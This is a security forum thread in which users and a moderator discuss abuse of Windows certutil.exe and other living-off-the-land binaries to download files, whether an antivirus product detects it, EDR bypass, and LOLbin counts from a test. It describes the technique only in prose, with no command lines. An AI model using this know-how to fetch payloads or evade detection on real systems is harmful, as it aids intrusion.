czesetfan 43 Posted April 15, 2024 Posted April 15, 2024 An interesting question was asked on that link: Is there a way to configure ESET to detect such LoL bin usage ? Would it be possible?
Administrators Marcos 5,730 Posted April 15, 2024 Administrators Posted April 15, 2024 ESET will not block powershell, java.exe, certutil.exe or whatever script interpreter or legitimate application just because it can be used to download both legit and malicious files. If the downloaded file was malicious, there's a very good chance it would be detected by ESET. Administrators can see any download activities by certutil in ESET Inspect and can take actions automatically based on LiveGrid information about downloaded files for instance.
itman 1,921 Posted April 15, 2024 Posted April 15, 2024 (edited) The certutil.exe abuse shown in the uTube video is detailed here: https://bdure.medium.com/lets-defend-suspicious-certutil-exe-usage-eventid-113-93e379611663 . Also, the attack is well known for sometime; Quote In 2017, Casey Smith, the same infosec researcher who told us about the risks in regsrv32, found a dual use for certutil. Smith noticed that certutil can be used to download a remote file. This is not completely surprising since certutil has remote capabilities, but it’s clearly not checking the format of the file — effectively turning certutil into LoL-ware version of curl. As it turns out, hackers were way ahead of the researchers. It was reported that Brazilians have been using certutil for some time. So if hackers obtain shell access through, say, an SQL injection attack, they can use certutil to download, say, a remote PowerShell script to continue the attack — without triggering any virus or malware scanners searching for obvious hacking tools. https://www.varonis.com/blog/the-malware-hiding-in-your-windows-system32-folder-part-iii-certutil-and-alternate-data-streams Eset could create an internal HIPS rule to scan for such command line usage of certutil.exe. Edited April 15, 2024 by itman
itman 1,921 Posted April 15, 2024 Posted April 15, 2024 1 hour ago, Marcos said: Administrators can see any download activities by certutil in ESET Inspect and can take actions automatically based on LiveGrid information about downloaded files for instance. Since Microsoft Defender on Win 10/11 can detect this activity, Eset consumer and Endpoint vers. via HIPS scanning should also detect it.
Administrators Marcos 5,730 Posted April 15, 2024 Administrators Posted April 15, 2024 8 minutes ago, itman said: Since Microsoft Defender on Win 10/11 can detect this activity, Eset consumer and Endpoint vers. via HIPS scanning should also detect it. Yes, if the downloaded file was malicious I'd expect it to be detected.
itman 1,921 Posted April 15, 2024 Posted April 15, 2024 1 hour ago, Marcos said: Yes, if the downloaded file was malicious I'd expect it to be detected. Which means if the file was 0-day malware, you're nailed.
itman 1,921 Posted April 16, 2024 Posted April 16, 2024 In regards to deploying certutil.exe to bypass EDR security solutions, this article: https://bishopfox.com/blog/edr-bypass-with-lolbins is worth a read. In a nutshell, just deploy another Win LOL binary.
itman 1,921 Posted April 16, 2024 Posted April 16, 2024 (edited) Using one of the LOLbins Project example for certutil.exe, I ran it as standard user from command prompt. It ran w/o issue; Of note is the downloaded file had no MotW status associated with it. This means it would not be Microsoft Defender cloud scanned. Also, no SmartScreen detection. Only thing displayed was an UAC alert to elevate to admin since the .exe is an installer with the alert noting untrusted publisher staus; Edited April 16, 2024 by itman
czesetfan 43 Posted April 24, 2024 Author Posted April 24, 2024 Doesn't this current testing just point to the questions in this topic? https://avlab.pl/en/protection-effectiveness-of-edr-solutions-against-internet-threats/
itman 1,921 Posted April 24, 2024 Posted April 24, 2024 (edited) 3 hours ago, czesetfan said: Doesn't this current testing just point to the questions in this topic? As far as malware sourced LOL bin use observed on their honeypot (I assume) for March (?); what count cmd.exe 3609 svchost.exe 2154 sc.exe 765 rundll32.exe 747 iexplore.exe 735 tor.exe 718 consent.exe 630 schtasks.exe 563 wmiprvse.exe 363 PhoneExperienceHost.exe 357 powershell.exe 296 reg.exe 153 wscript.exe 129 taskkill.exe 103 msbuild.exe 80 ping.exe 56 control.exe 40 wmic.exe 40 csc.exe 26 regsvr32.exe 16 dism.exe 15 conhost.exe 13 taskhost.exe 13 net1.exe 8 attrib.exe 5 msiexec.exe 5 certutil.exe 4 mshta.exe 2 cscript.exe 1 No indication of how many of these samples, if any, were used in the March test. BTW - ESSP and Panda were the only tested products that missed a tested malware sample. Edited April 24, 2024 by itman
Recommended Posts